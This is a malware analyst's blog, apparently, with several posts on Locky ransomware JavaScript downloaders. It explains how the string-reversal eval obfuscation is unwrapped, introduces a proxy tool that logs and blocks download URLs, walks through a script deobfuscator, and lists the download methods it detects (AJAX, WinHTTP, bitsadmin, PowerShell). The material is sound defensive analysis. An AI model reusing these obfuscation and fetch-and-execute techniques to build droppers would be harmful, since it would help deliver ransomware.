Locky JS and URL Revealer

From various reports, it appears that the malicious Javascript files sent via email that pull Locky down is back.

Let’s see what these scripts look like:

2016-06-22_01

At the bottom of the script, is this function that reverses the string above, joins the characters, then evaluates it:

eval(aBN3DmdER7P.split(”).reverse().join(”));

Since we’re dealing with JScript, we can just do this and capture the result instead of executing it:

WScript.Echo(aBN3DmdER7P.split(”).reverse().join(”));

Now we get this:

2016-06-22_02

This script employs a lot of nonsense functions that just returns exactly what gets sent to it in an attempt to make it harder to figure out what’s going on.

After I beautify the script and scan through everything, I come across the main function that downloads a file from the Internet. It’s using the familiar AJAX method.

2016-06-22_03

I echo out the URL array to see where the requests are going. There’s three URLs it’s attempting to connect to. If the site is up then Locky gets downloaded and executed.

2016-06-22_04

This round of scripts are similar to the ones that were sent before the Locky gang took a break. If you’ve been tracking their scripts, you know that they make a lot of changes to bypass filters but they are essentially all AJAX downloaders.

Instead of trying to keep up with their constant script variations, why not use a web proxy I thought? You just run the script in a VM and catch the URLs being called. There’s Fiddler, Paros, Burp, etc I could use but I thought I would try to make something more lightweight and portable.

URL Revealer
Here’s my take on a web proxy. This program will capture the request from these scripts and drop it so it won’t download the malware from the Internet. This way you can see the URLs and take the necessary action quickly and without having to deobfuscate the script.

When you run URL Revealer (in a VM!), it will automatically set up a proxy server on port 8080 and write the captured URLs to a text file to the app path. You should open up your browser and test it to make sure it’s working properly before executing the script you want to analyze. You should also set your VM’s network adapter to “host-only” while doing this just to be safe.

Here’s what it looks like when I run four recent Locky scripts plus two from the past two weeks:

2016-06-22_05

I killed the wscript process in between runs otherwise the script would just keep going. URL Revealer will ignore repeated hits to the same URL as long as it’s exactly the same as the one before.

When you are done, press to quit so that URL Revealer can disable the proxy server. If you forget, just run URL Revealer and hit enter a couple of times until it quits.

If you run the program from an elevated command line, you can change the proxy port as well as the capture filename.

2016-06-22_06

Over the past several months, I saw four methods used by various scripts to download malware from the Internet – ajax, winhttp, bitsadmin, and powershell. URLRevealer should detect and block the requests for all of these methods. If you encounter a new method, please let me know.

You can get the program here.

Posted in Malicious Email, Malscript, Tools | Tagged , , , , | Comments Off on Locky JS and URL Revealer

Script Deobfuscator Updated

Continuing from my last blog post, I updated the program to handle the latest obfuscated Javascript technique. I made the logic generic in order to handle future versions and variants so the results may come out a bit weird (e.g. stray tick marks). But the main thing is that you’ll be able to see what these scripts are doing.

I broke out the concatenation option by script type so this should improve the results somewhat better than before.

2016-02-22_01

2016-02-22_02

2016-02-22_03

I hope this works for most of the scripts you encounter. And thank you for your continued support!

Posted in Malscript, Tools | Tagged , , , | Comments Off on Script Deobfuscator Updated

Deobfuscating a Hideous-Looking JS Downloader

One of my readers, Stefano from zanna.it (thanks!), sent me this little gem:

2016-02-21_01

In the midst of seemingly random strings, there are clues to its structure but there’s very little to go on. I started off by grabbing a portion of the script and having it show me what the variable contains.

2016-02-21_02

The string of gibberish is lined up in an array but only the last value is collected. Here, you can see the individual characters that make up the call to the URL.

2016-02-21_03

I found another script that employs the same method. In this version, the values outside of the elements between parenthesis are collected. The first section spells out “ActiveXObject”.

2016-02-21_04

Here’s yet another script that uses the same method and then takes it up another level. The first section also spells out “ActiveXObject” but this time, it makes use of an interesting behavior where the first character of the string attached to the “.e()” property is collected. Note: You need to unescape the script to convert the decimal values to a single character.

2016-02-21_05

Writing a program to extract the correct value is a little tricky but doable. I’ll need to test this further before releasing the program but it seems to work.

Example #1

2016-02-21_06

Example #2

2016-02-21_07

Example #3…for this one, I had to unescape the script first.

2016-02-21_08

In these three example scripts, it downloads an executable, saves it to the temp folder then executes it.

Posted in Malicious Email, Malscript | Tagged , | Comments Off on Deobfuscating a Hideous-Looking JS Downloader

Script Deobfuscator Released

The purpose of this tool is to help you perform static analysis on obfuscated scripts. It’s often easier to dynamically analyze scripts but there are times when you just don’t know where to start or you just want a high-level view of what’s going on with the script. This tool may be able to help you.

I already wrote a tool called PHP Script Decoder but this new version has been re-written in .NET with new functionality and flexibility in order to handle PHP, Javascript, VBA, and VBS scripts.

To explain how to use this tool, let me show you how to tackle seven different obfuscated scripts.

Example #1 (unphp)

Here’s what the script looks like. Looking at the script, you’ll see an array of base64-encoded strings at the top. Following that are references to specific elements from the array.

2016-02-15_01

Paste in the script sections like so. The script you are trying to deobfuscate is at the top. The array of base64-encoded strings separated by commas in the middle section. I enter the search string value of “_705650624(#)” since that’s how the script at the top references the elements from the array (note: the pound sign is a wildcard and must be present). I select the “Array” method and click on the “Convert” button.

2016-02-15_02

The results still show encoded strings so now I check the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options and try again.

2016-02-15_03

The script has been deobfuscated and much easier to read. The script won’t execute though because the strings are quoted (or unquoted) incorrectly.

Example #2 (ddecode)

Here’s the script we’ll be working on:

2016-02-15_04

First we need to unescape it so click on the “Unescape” button. If you right-click on the Output box, there’s an option to save the results to a text file. (You can right-click on the Input box and read in a file too.)

2016-02-15_05

Click on “Copy Output to Input” to move the result to the top. This script uses randomize variable names and assigns a value to it. The later portion references the value.

The tool will parse the script and load each variable and associated value into an array. It then does a search for the variable and replaces it with the value.

Choose the “Random Vars 1” method. The delimiter for this script is a semi-colon and for the search string I enter ${“GLOBALS”}[“#”]=”*”; The pound sign is a placeholder for the variable name and the asterisk is the placeholder for the value.

Here’s the result:

2016-02-15_06

Example #3 (unphp)

This script also uses random variable names but in this version, the strings are base64-encoded. The top portion defines the global variables while the lower section, beginning at “session_start()”, references them.

2016-02-15_07

Paste the script sections in the tool as follows then choose the “Random Vars 2” method and the “Base64 Decode” and “Keep Quotes” options. Note the search string has spaces in between so that it matches the script at the top.

2016-02-15_08

Example #4 (unphp)

Here’s what the script looks like (I highlighted the key):

2016-02-15_09

This script references an element in an array to build the values for its variables. The elements are based on the character position in the key.

The first step is to paste the entire script in the input box and choose the key lookup option. I use $f9[#] as the search string. In the Lookup Key box, paste the key and remove the starting and ending quotes. Also make sure the key you paste in has been properly escaped. You can see there’s concatenation going on so check the “Concatenate” option.

2016-02-15_10

Example #5 (ddecode)

In this example, we’re just interested in decoding the base64 strings.

2016-02-15_11

Copy the entire script to the Input box, choose the “Base64” method as well as the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options. Make sure the delimiter and search string matches that of the script.

2016-02-15_12

Example #6 (pastebin)

This script is uses the Joomla exploit and contains decimal values making it tough to see immediately what this does.

2016-02-15_13

Paste the script into the Input box and choose the “ASCII” method.

2016-02-15_14

Almost but it’s not concatenated. If you choose the “Concatenate” option, it won’t clean up everything. In the “Output Options” section, there’s a “Remove Chars” box. Enter a period and try again.

2016-02-15_15

Example #7 (pastebin)

This last example is a VBA script. It does a simple math calculation then the result is convert to its ASCII character equivalent.

2016-02-15_16

Paste the script in and choose the “Math” method.

2016-02-15_17

The result shows decimal values but not the text equivalent. 🙁 So enter “chr(” into the “Pre Str” box and a closing parenthesis in the “Post Str” box.

2016-02-15_18

Look familiar? Now we can use the “ASCII” method to get the characters. I also entered an ampersand and space character in the “Remove Chars” box.

2016-02-15_19

The resulting deobfuscated script will probably error out if you try executing it. Again, all this tool will do is try to make the script readable so you can better understand it. You may need to use this tool on parts of the script then put them back together yourself to figure things out.

I tried to make the functions in this tool flexible and generic enough to handle whatever scripts come your way. However, if you encounter something new, please let me know. You can get the tool here.

Happy reversing!

Posted in Malscript, Tools | Tagged , , , , , | Comments Off on Script Deobfuscator Released

Packing/Unpacking Javascript from DOS

Here’s one way to pack and unpack Javascript from the Windows’ command line. For this we use PhantomJS and Dean Edwards’ Javascript Compressor.

1. Download PhantomJS from here.

2. Download the JSPacker.js file from here.

3. Put everything in a folder or on your desktop then in DOS type the following:

C:\> phantomjs jspacker.js pack in.txt out.txt

-or-

C:\> phantomjs jspacker.js unpack in.txt out.txt

2016-02-06_01

Posted in Tools | Tagged , , , | Comments Off on Packing/Unpacking Javascript from DOS